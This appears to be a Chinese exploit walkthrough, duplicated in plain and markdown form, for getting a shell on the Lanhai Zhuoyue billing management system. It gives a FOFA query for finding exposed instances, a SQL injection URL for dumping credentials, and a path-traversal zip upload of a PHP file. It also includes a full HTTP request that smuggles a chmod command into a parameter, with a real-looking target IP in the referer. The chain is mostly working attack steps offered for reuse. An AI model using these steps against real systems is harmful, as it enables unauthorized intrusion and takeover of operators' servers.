fofamini-wiki

登录白背景

源码

蓝海卓越计费管理系统多漏洞导致getshell

一、漏洞简介

蓝海卓越认证计费管理系统是一套以实现网络运营为基础，增强全局安全为中心，提高管理效率为目的的网络安全运营管理系统，提供“高安全、可运营、易管理”的运营管理体验，基于标准的RADIUS协议开发，它不仅支持PPPOE和WEB认证计费，还支持802.1X接入控制技术，与其他厂商支持相应标准的产品兼容，结合蓝海卓越的PPPOE服务器网关，可提供更加丰富的功能。，另外，友好的Web访问管理的方式，为用户提供更好用、易用的方式，更贴心的使用形式。蓝海卓越计费管理系统多漏洞导致getshell

二、影响版本

蓝海卓越计费管理系统

三、资产测绘

fofatitle=="蓝海卓越计费管理系统"
特征

四、漏洞复现

/ajax/loaduser.php?UserName=1

通过注入跑出账号密码

使用MD5解密出密码后登录系统

点击PORTAL模板下面的PORTAL模板管理，选择上传模板

root.zip
由于新版本系统的模板位置不在web路径下，所以需要穿越模板路径
Web绝对路径：

/usr/local/usr-gui/

模板路径：

/mnt/mysql/usr/local/portal/themes/20240519093115_xxx/

制作一个如下的压缩包：

test.php内容为：字符编码必须为Unix(LF)

#!/bin/php
<?php
phpinfo();
?>

上传zip压缩包

Shell位置为：

/test.php

但是访问时会提示：

接下来就需要使用后台命令执行漏洞进行权限赋予：

GET /ajax_check.php?portaltheme_del_id=4&portaltheme_del_dir=%2Fmnt%2Fmysql%2Fusr%2Flocal%2Fportal%2Fthemes%2F20210519093903_738%2F|chmod+755+/usr/local/usr-gui/test.php HTTP/1.1
Host: 
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://124.114.151.106:8880/portaltheme_list.php
Accept-Language: zh-CN,zh;q=0.9
Cookie: mylang=zh_s; PHPSESSID=lp91fvnja6f987dj7jmkjh5601
Connection: close

之后再次访问

/test.php

原文: https://www.yuque.com/xiaokp7/ocvun2/dbwc8rx9kq4t14eb

# 蓝海卓越计费管理系统多漏洞导致getshell

# 一、漏洞简介
 蓝海卓越认证计费管理系统是一套以实现网络运营为基础，增强全局安全为中心，提高管理效率为目的的网络安全运营管理系统，提供“高安全、可运营、易管理”的运营管理体验，基于标准的RADIUS协议开发，它不仅支持PPPOE和WEB认证计费，还支持802.1X接入控制技术，与其他厂商支持相应标准的产品兼容，结合蓝海卓越的PPPOE服务器网关，可提供更加丰富的功能。，另外，友好的Web访问管理的方式，为用户提供更好用、易用的方式，更贴心的使用形式。蓝海卓越计费管理系统多漏洞导致getshell

# 二、影响版本

- 蓝海卓越 计费管理系统

# 三、资产测绘

- fofa`title=="蓝海卓越计费管理系统"`
- 特征

![image.png](./img/qe1tkFLp9GezjB1g/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-761633.png)

# 四、漏洞复现
```
/ajax/loaduser.php?UserName=1
```
通过注入跑出账号密码
![image.png](./img/qe1tkFLp9GezjB1g/1716389345421-9e38d8dd-0c85-4c42-ac5d-d9fb1116d3a3-998541.png)
使用MD5解密出密码后登录系统
![image.png](./img/qe1tkFLp9GezjB1g/1716389833186-8bbff4b6-dff5-46f8-855d-a6a901787035-789634.png)
![image.png](./img/qe1tkFLp9GezjB1g/1716389848399-cb2cc634-200c-4818-be59-4381433c5a6b-604039.png)
点击PORTAL模板下面的PORTAL模板管理，选择上传模板
![image.png](./img/qe1tkFLp9GezjB1g/1716390460832-fd0d98ce-26e8-41ea-973e-95e1b6ae9522-389700.png)
[root.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/29512878/1716438804359-a43f8695-df0c-4b28-83bc-e23064072257.zip?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fzip%2F29512878%2F1716438804359-a43f8695-df0c-4b28-83bc-e23064072257.zip%22%2C%22name%22%3A%22root.zip%22%2C%22size%22%3A219%2C%22ext%22%3A%22zip%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u6690e024-ebbb-46c0-8a47-d980e643c5c%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u2c027448%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
由于新版本系统的模板位置不在web路径下，所以需要穿越模板路径
Web绝对路径：
```
/usr/local/usr-gui/
```
模板路径：
```
/mnt/mysql/usr/local/portal/themes/20240519093115_xxx/
```
制作一个如下的压缩包：
![image.png](./img/qe1tkFLp9GezjB1g/1716389926031-814570a6-da10-4a06-ab0b-d76d6c891411-928057.png)
test.php内容为：字符编码必须为Unix(LF)
```
#!/bin/php
<?php
phpinfo();
?>
```
![image.png](./img/qe1tkFLp9GezjB1g/1716390048945-ca864ffe-6e01-4bb6-8592-e78b6a92518e-245199.png)

上传zip压缩包
![image.png](./img/qe1tkFLp9GezjB1g/1716390233650-ab77d4c6-3b4f-47a0-a7ae-3118efd6819f-129226.png)
Shell位置为：
```
/test.php
```
但是访问时会提示：
![image.png](./img/qe1tkFLp9GezjB1g/1716390275360-c5689377-8edc-4977-a8dd-7f3449abc878-853308.png)
接下来就需要使用后台命令执行漏洞进行权限赋予：
```
GET /ajax_check.php?portaltheme_del_id=4&portaltheme_del_dir=%2Fmnt%2Fmysql%2Fusr%2Flocal%2Fportal%2Fthemes%2F20210519093903_738%2F|chmod+755+/usr/local/usr-gui/test.php HTTP/1.1
Host: 
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://124.114.151.106:8880/portaltheme_list.php
Accept-Language: zh-CN,zh;q=0.9
Cookie: mylang=zh_s; PHPSESSID=lp91fvnja6f987dj7jmkjh5601
Connection: close

```
![image.png](./img/qe1tkFLp9GezjB1g/1716390344536-d72391d6-2178-4dfa-ac0e-72962047e530-595073.png)
之后再次访问
```
/test.php
```
![image.png](./img/qe1tkFLp9GezjB1g/1716390374521-ebe7f986-e300-4ac6-8b2a-d9e26cf8f674-104277.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dbwc8rx9kq4t14eb>